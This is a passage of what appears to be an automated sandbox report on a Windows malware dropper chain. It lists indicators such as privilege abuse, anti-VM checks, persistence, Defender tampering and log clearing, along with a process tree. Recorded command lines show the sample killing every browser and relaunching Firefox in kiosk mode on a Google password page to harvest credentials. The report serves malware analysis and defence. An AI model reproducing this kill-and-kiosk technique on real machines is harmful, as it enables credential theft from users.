pid Process 5024 2S3134.exe 5024 2S3134.exe 4512 3H33Q.exe 4512 3H33Q.exe 3128 4Y209P.exe 3128 4Y209P.exe 836 skotes.exe 836 skotes.exe 4584 0a194f8bd0.exe 4584 0a194f8bd0.exe 3028 tmpE01F.tmp.exe 3028 tmpE01F.tmp.exe 5496 6a18abcebc.exe 5496 6a18abcebc.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 4292 d6e331f93f.exe 4292 d6e331f93f.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 4292 d6e331f93f.exe 4292 d6e331f93f.exe 4292 d6e331f93f.exe 3028 tmpE01F.tmp.exe 3028 tmpE01F.tmp.exe 3028 tmpE01F.tmp.exe 1464 skotes.exe 1464 skotes.exe 3932 aspnet_compiler.exe 3932 aspnet_compiler.exe 3932 aspnet_compiler.exe 3420 tmp1311.tmp.exe 3420 tmp1311.tmp.exe 4708 tmp136F.tmp.exe 4708 tmp136F.tmp.exe 3420 tmp1311.tmp.exe 3420 tmp1311.tmp.exe 3420 tmp1311.tmp.exe 7892 skotes.exe 7892 skotes.exe 8176 powershell.exe 8176 powershell.exe 8176 powershell.exe 5460 msedge.exe 5460 msedge.exe 6392 msedge.exe 6392 msedge.exe 4708 tmp136F.tmp.exe 4708 tmp136F.tmp.exe 4708 tmp136F.tmp.exe 7816 wdeffp.exe 5652 powershell.exe 5652 powershell.exe 5652 powershell.exe 7108 identity_helper.exe 7108 identity_helper.exe 7816 wdeffp.exe 7816 wdeffp.exe 7816 wdeffp.exe 7816 wdeffp.exe 7816 wdeffp.exe 7816 wdeffp.exe 7816 wdeffp.exe 7816 wdeffp.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2252 DLER214.exe Token: SeDebugPrivilege 3028 tmpE01F.tmp.exe Token: SeDebugPrivilege 5600 taskkill.exe Token: SeDebugPrivilege 5912 taskkill.exe Token: SeDebugPrivilege 6040 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 4968 taskkill.exe Token: SeDebugPrivilege 5736 firefox.exe Token: SeDebugPrivilege 5736 firefox.exe Token: SeDebugPrivilege 4292 d6e331f93f.exe Token: SeDebugPrivilege 3028 tmpE01F.tmp.exe Token: SeDebugPrivilege 6164 InstallUtil.exe Token: SeDebugPrivilege 3932 aspnet_compiler.exe Token: SeDebugPrivilege 3932 aspnet_compiler.exe Token: SeDebugPrivilege 5396 InstallUtil.exe Token: SeDebugPrivilege 6680 fvkoke.exe Token: SeDebugPrivilege 3664 ohrpqf.exe Token: SeDebugPrivilege 3420 tmp1311.tmp.exe Token: SeDebugPrivilege 4708 tmp136F.tmp.exe Token: SeDebugPrivilege 3420 tmp1311.tmp.exe Token: SeDebugPrivilege 8176 powershell.exe Token: SeDebugPrivilege 4708 tmp136F.tmp.exe Token: SeDebugPrivilege 5652 powershell.exe Token: SeDebugPrivilege 7400 dialer.exe Token: SeShutdownPrivilege 3160 powercfg.exe Token: SeCreatePagefilePrivilege 3160 powercfg.exe Token: SeShutdownPrivilege 5448 powercfg.exe Token: SeCreatePagefilePrivilege 5448 powercfg.exe Token: SeShutdownPrivilege 5860 powercfg.exe Token: SeCreatePagefilePrivilege 5860 powercfg.exe Token: SeShutdownPrivilege 5556 powercfg.exe Token: SeCreatePagefilePrivilege 5556 powercfg.exe Token: SeDebugPrivilege 7832 powershell.exe Token: SeDebugPrivilege 6416 dialer.exe Token: SeShutdownPrivilege 6608 powercfg.exe Token: SeCreatePagefilePrivilege 6608 powercfg.exe Token: SeShutdownPrivilege 4568 powercfg.exe Token: SeCreatePagefilePrivilege 4568 powercfg.exe Token: SeShutdownPrivilege 6600 powercfg.exe Token: SeCreatePagefilePrivilege 6600 powercfg.exe Token: SeShutdownPrivilege 6580 powercfg.exe Token: SeCreatePagefilePrivilege 6580 powercfg.exe Token: SeLockMemoryPrivilege 6956 dialer.exe Token: SeAssignPrimaryTokenPrivilege 1668 svchost.exe Token: SeIncreaseQuotaPrivilege 1668 svchost.exe Token: SeSecurityPrivilege 1668 svchost.exe Token: SeTakeOwnershipPrivilege 1668 svchost.exe Token: SeLoadDriverPrivilege 1668 svchost.exe Token: SeSystemtimePrivilege 1668 svchost.exe Token: SeBackupPrivilege 1668 svchost.exe Token: SeRestorePrivilege 1668 svchost.exe Token: SeShutdownPrivilege 1668 svchost.exe Token: SeSystemEnvironmentPrivilege 1668 svchost.exe Token: SeUndockPrivilege 1668 svchost.exe Token: SeManageVolumePrivilege 1668 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1668 svchost.exe Token: SeIncreaseQuotaPrivilege 1668 svchost.exe Token: SeSecurityPrivilege 1668 svchost.exe Token: SeTakeOwnershipPrivilege 1668 svchost.exe Token: SeLoadDriverPrivilege 1668 svchost.exe Token: SeSystemtimePrivilege 1668 svchost.exe Token: SeBackupPrivilege 1668 svchost.exe Token: SeRestorePrivilege 1668 svchost.exe Token: SeShutdownPrivilege 1668 svchost.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 3128 4Y209P.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe -
Suspicious use of SendNotifyMessage 55 IoCs
pid Process 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5736 firefox.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 5532 ba99f65d60.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe 6392 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5736 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3112 wrote to memory of 400 3112 6dfd3f8435cb9fda6843ea12c5e83f0d.exe 84 PID 3112 wrote to memory of 400 3112 6dfd3f8435cb9fda6843ea12c5e83f0d.exe 84 PID 3112 wrote to memory of 400 3112 6dfd3f8435cb9fda6843ea12c5e83f0d.exe 84 PID 400 wrote to memory of 5024 400 R2L54.exe 87 PID 400 wrote to memory of 5024 400 R2L54.exe 87 PID 400 wrote to memory of 5024 400 R2L54.exe 87 PID 400 wrote to memory of 4512 400 R2L54.exe 103 PID 400 wrote to memory of 4512 400 R2L54.exe 103 PID 400 wrote to memory of 4512 400 R2L54.exe 103 PID 3112 wrote to memory of 3128 3112 6dfd3f8435cb9fda6843ea12c5e83f0d.exe 104 PID 3112 wrote to memory of 3128 3112 6dfd3f8435cb9fda6843ea12c5e83f0d.exe 104 PID 3112 wrote to memory of 3128 3112 6dfd3f8435cb9fda6843ea12c5e83f0d.exe 104 PID 3128 wrote to memory of 836 3128 4Y209P.exe 108 PID 3128 wrote to memory of 836 3128 4Y209P.exe 108 PID 3128 wrote to memory of 836 3128 4Y209P.exe 108 PID 836 wrote to memory of 2252 836 skotes.exe 110 PID 836 wrote to memory of 2252 836 skotes.exe 110 PID 836 wrote to memory of 2252 836 skotes.exe 110 PID 2252 wrote to memory of 3028 2252 DLER214.exe 112 PID 2252 wrote to memory of 3028 2252 DLER214.exe 112 PID 2252 wrote to memory of 3028 2252 DLER214.exe 112 PID 836 wrote to memory of 4584 836 skotes.exe 113 PID 836 wrote to memory of 4584 836 skotes.exe 113 PID 836 wrote to memory of 4584 836 skotes.exe 113 PID 3028 wrote to memory of 2252 3028 tmpE01F.tmp.exe 114 PID 3028 wrote to memory of 2252 3028 tmpE01F.tmp.exe 114 PID 3028 wrote to memory of 2252 3028 tmpE01F.tmp.exe 114 PID 2252 wrote to memory of 5228 2252 cmd.exe 117 PID 2252 wrote to memory of 5228 2252 cmd.exe 117 PID 2252 wrote to memory of 5228 2252 cmd.exe 117 PID 836 wrote to memory of 5496 836 skotes.exe 120 PID 836 wrote to memory of 5496 836 skotes.exe 120 PID 836 wrote to memory of 5496 836 skotes.exe 120 PID 836 wrote to memory of 5532 836 skotes.exe 123 PID 836 wrote to memory of 5532 836 skotes.exe 123 PID 836 wrote to memory of 5532 836 skotes.exe 123 PID 5532 wrote to memory of 5600 5532 ba99f65d60.exe 124 PID 5532 wrote to memory of 5600 5532 ba99f65d60.exe 124 PID 5532 wrote to memory of 5600 5532 ba99f65d60.exe 124 PID 5532 wrote to memory of 5912 5532 ba99f65d60.exe 127 PID 5532 wrote to memory of 5912 5532 ba99f65d60.exe 127 PID 5532 wrote to memory of 5912 5532 ba99f65d60.exe 127 PID 5532 wrote to memory of 6040 5532 ba99f65d60.exe 129 PID 5532 wrote to memory of 6040 5532 ba99f65d60.exe 129 PID 5532 wrote to memory of 6040 5532 ba99f65d60.exe 129 PID 5532 wrote to memory of 2456 5532 ba99f65d60.exe 131 PID 5532 wrote to memory of 2456 5532 ba99f65d60.exe 131 PID 5532 wrote to memory of 2456 5532 ba99f65d60.exe 131 PID 5532 wrote to memory of 4968 5532 ba99f65d60.exe 133 PID 5532 wrote to memory of 4968 5532 ba99f65d60.exe 133 PID 5532 wrote to memory of 4968 5532 ba99f65d60.exe 133 PID 5532 wrote to memory of 4044 5532 ba99f65d60.exe 135 PID 5532 wrote to memory of 4044 5532 ba99f65d60.exe 135 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 PID 4044 wrote to memory of 5736 4044 firefox.exe 136 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1224
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2652
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1448
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2540
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1676
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2796
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2872
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3412
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\6dfd3f8435cb9fda6843ea12c5e83f0d.exe"C:\Users\Admin\AppData\Local\Temp\6dfd3f8435cb9fda6843ea12c5e83f0d.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\R2L54.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\R2L54.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S3134.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S3134.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5024 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 15765⤵
- Program crash
PID:4012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 16085⤵
- Program crash
PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3H33Q.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3H33Q.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4Y209P.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4Y209P.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Users\Admin\AppData\Local\Temp\1004053001\DLER214.exe"C:\Users\Admin\AppData\Local\Temp\1004053001\DLER214.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\tmpE01F.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE01F.tmp.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release8⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:5228
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew7⤵
- System Location Discovery: System Language Discovery
PID:6208 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew8⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:6252
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004054001\0a194f8bd0.exe"C:\Users\Admin\AppData\Local\Temp\1004054001\0a194f8bd0.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 16126⤵
- Program crash
PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004055001\6a18abcebc.exe"C:\Users\Admin\AppData\Local\Temp\1004055001\6a18abcebc.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\1004056001\ba99f65d60.exe"C:\Users\Admin\AppData\Local\Temp\1004056001\ba99f65d60.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5532 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5736 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2060 -parentBuildID 20240401114208 -prefsHandle 1984 -prefMapHandle 1976 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54afcae7-98b5-456b-9c99-258facc45af3} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" gpu8⤵PID:6008
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2492 -parentBuildID 20240401114208 -prefsHandle 2468 -prefMapHandle 2464 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82e691c9-0939-40be-a0f9-36a45ad9be80} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" socket8⤵PID:6136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3216 -prefMapHandle 3232 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17c52f22-9532-4e6d-9364-2a2f0136b505} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" tab8⤵PID:4916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3988 -childID 2 -isForBrowser -prefsHandle 3980 -prefMapHandle 2892 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0e101e4-4ef8-4e9e-bdf5-3d7a1565c436} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" tab8⤵PID:1732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4856 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4848 -prefMapHandle 4844 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b5d59de-ca2d-4946-9598-21cc599d54a3} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" utility8⤵
- Checks processor information in registry
PID:5636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 3 -isForBrowser -prefsHandle 5688 -prefMapHandle 5684 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4cc42e51-d442-41fb-8f18-ec8bb1bb032e} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" tab8⤵PID:4316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 4 -isForBrowser -prefsHandle 5912 -prefMapHandle 5908 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b24876f-0af1-43a6-8736-8a4319f0663e} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" tab8⤵PID:4032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6064 -childID 5 -isForBrowser -prefsHandle 5808 -prefMapHandle 5812 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a040fbed-a9ed-49be-bd2c-bdaed9983aeb} 5736 "\\.\pipe\gecko-crash-server-pipe.5736" tab8⤵PID:3156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004057001\d6e331f93f.exe"C:\Users\Admin\AppData\Local\Temp\1004057001\d6e331f93f.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
